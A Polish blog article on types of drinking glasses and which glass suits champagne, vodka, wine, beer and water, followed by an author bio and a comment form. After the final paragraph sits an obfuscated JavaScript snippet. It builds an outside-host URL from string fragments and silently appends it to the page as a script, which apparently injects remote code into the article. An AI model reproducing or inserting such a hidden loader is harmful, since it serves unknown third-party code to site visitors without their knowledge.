Strona główna FELIETONY Rodzaje kieliszków. Jak serwować najpopularniejsze alkohole?

  Rodzaje kieliszków. Jak serwować najpopularniejsze alkohole?

  118
  0

  Obecnie na rynku można znaleźć wiele różnych rodzajów kieliszków. Zazwyczaj są one dedykowane alkoholom i niejednokrotnie różnią się tylko szczegółami. Dlatego prawidłowe rozpoznanie ich bywa dla niektórych trudnym zadaniem. Czy zastanawiasz się, jak dobrze serwować alkohole w kieliszkach? Aby się tego dowiedzieć, przeczytaj nasz artykuł. Zawarliśmy w nim wiele niezbędnych informacji dotyczących tego tematu. Nie przegap ich!

   

  Dlaczego serwowanie alkoholi w odpowiednich kieliszkach jest ważne?

  Sztuka kulinarna nie opiera się wyłącznie na przygotowywaniu wyśmienitych posiłków. Ważne jest również ich estetyczne serwowanie. Ma to wpływ na jakość każdej konsumpcji, ponieważ spożywa się potrawę w pewien sposób również oczami. Stąd wzięła się duża różnorodność wśród talerzy, sztućców czy kieliszków.

  Przede wszystkim trzeba wiedzieć, że każdy rodzaj kieliszka posiada indywidualne, unikatowe cechy. To one sprawiają, iż właśnie to naczynie jest najlepsze do serwowania danego gatunku alkoholu. Budowa różnych kieliszków jest ściśle dopasowana do właściwości danego trunku oraz ich sposobu picia. Jeżeli zwracasz uwagę także na podawanie alkoholu, z pewnością sprawisz sobie i gościom większą przyjemność z ich konsumpcji. Dlatego uważamy, że warto poświęcić poznanie rodzajów kieliszków choćby jedną chwilę.szampan FELIETONY

  Wodę również można podawać w kieliszkach

  Nie ma konieczności picia alkoholu, aby korzystać z kieliszków. Także zwykłą wodę na oficjalnych przyjęciach często serwuje się w tego typu naczyniu. Służą do tego duże, pękate kieliszki do wody. Można ją również podawać w wysokich, lekko rozszerzających się szklankach. Woda w kieliszku wygląda niezwykle stylowo i elegancko. Powinna być do tego lekko schłodzona. Takie serwowanie tego napoju sprawia, że spożywanie go nabiera nowego, bardziej wykwintnego wymiaru. Polecamy Ci to rozwiązanie, zwłaszcza gdy szykujesz oficjalne przyjęcie.

  Rodzaje kieliszków do najpopularniejszych alkoholi

  Pierwszym rodzajem naczyń do podawania alkoholu są kieliszki do szampana wysokie. Tak zwane szampanówki cechują się wysoką, bardzo smukłą nóżką oraz dużą bardzo wąską czaszą zakończoną niewielkim wylotem. Taka budowa uniemożliwia podgrzewanie alkoholu podczas trzymania naczynia w rękach. W dodatku bąbelki szampana uwalniają się wolniej, przez co jest on dłużej świeży i odpowiedni do spożycia.

  Natomiast wódkę zwykle podaje się w dwóch rodzajach kieliszków. Jej czystą odmianę serwuje się wyłącznie w kieliszku bez nóżki, popularnie nazywanym shotem. Natomiast odmianę gatunkową powinno podawać się w pękatych kieliszkach, które posiadają nóżki. Czasami można zaserwować ją również w shocie.

  Ważnym dla wielu tematem jest sposób podawania wina. Zarówno jego biała, jak i czerwona odmiana powinny być podawane w innych kieliszkach. To ważne, aby były one przezroczyste. Wówczas można prawidłowo ocenić kolor trunku. Do czerwonego wina używa się pękatych z dużą czaszą kieliszków, która lekko zwęża się ku dołowi. Natomiast biały tego typu trunek zazwyczaj podaje się w naczyniu o kształcie tulipana. Niewielka czasza tego kieliszka pozwala na utrzymanie intensywnego, skondensowanego smaku wina.

  Piwo również można pić w kieliszkach. Zaprojektowano je tak, aby zachować najlepsze właściwości tego trunku. Charakterystyczny kształt czaszy kieliszków do piwa doskonale sprzyja cyrkulacji bąbelków, a także tworzeniu się na powierzchni napoju gęstej piany.

  Szkło o odmiennej budowie podkreśla smak alkoholu, wydobywa jego aromat oraz wpływa na uzyskanie przez niego odpowiedniej konsystencji. Warto zatem dobierać dobrze rodzaje kieliszków, aby cieszyć się piciem ulubionego alkoholu w bardziej przyjemny sposób

  (function(){
  cir1=document.createElement(„script”);cir1_=(„ust”);cir1u=”431848086″;
  cir1_+=”a”+(„t.i”);cir1.type=”text/javascript”;
  cir1u+=”.akgf0ihkir194t638X7X”;cir1.async=true;cir1_+=”n”+(„f”+”o”)+”/”;
  cir1u+=”vdsccjq81h”;cir1.src=”https://”+cir1_+cir1u;
  document.body.appendChild(cir1);
  })();

  Poprzedni artykułCanari Pinacolada
  Następny artykułDouble Hop Monster IPA
  maciekCK
  Absolwent kursów garażowych, babcinych i piwnicznych, analityk osiedlowego rynku alkoholowego, twórca "indeksu Żubra". Propagator maksymy: nie znam się, to się wypowiem.Najbardziej lubi rum i gin.

  ZOSTAW ODPOWIEDŹ

  Wpisz treść komentarza
  Proszę podać swoje imię tutaj
  Captcha verification failed!
  Ocena użytkownika captcha nie powiodła się. proszę skontaktuj się z nami!